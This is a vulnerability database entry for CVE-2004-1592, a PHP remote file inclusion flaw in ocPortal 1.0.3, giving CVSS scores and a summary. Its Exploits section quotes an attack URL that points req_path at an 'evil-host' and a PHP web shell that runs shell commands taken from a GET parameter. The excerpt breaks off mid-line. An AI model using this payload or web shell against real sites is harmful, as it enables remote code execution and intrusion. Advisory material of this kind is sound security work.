7.5
CVSSv2

CVE-2004-1592

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in index.php in ocPortal 1.0.3 and previous versions allows remote malicious users to execute arbitrary PHP code by modifying the req_path parameter to reference a URL on a remote web server that contains a malicious funcs.php script.

Vulnerable Product Search on Vulmon Subscribe to Product

ocportal ocportal 1.0.3

Exploits

localhost/ocp-103/indexphp?req_path=http ://evil-host/ On your evil host you must put scipt funcsphp Example of funcsphp if your host doesn't support php <?php $com = $_GET["com"]; system ("$com"); ?> Example of funcsphp if your host support php <?php echo '<?php $com = $_GET["com ...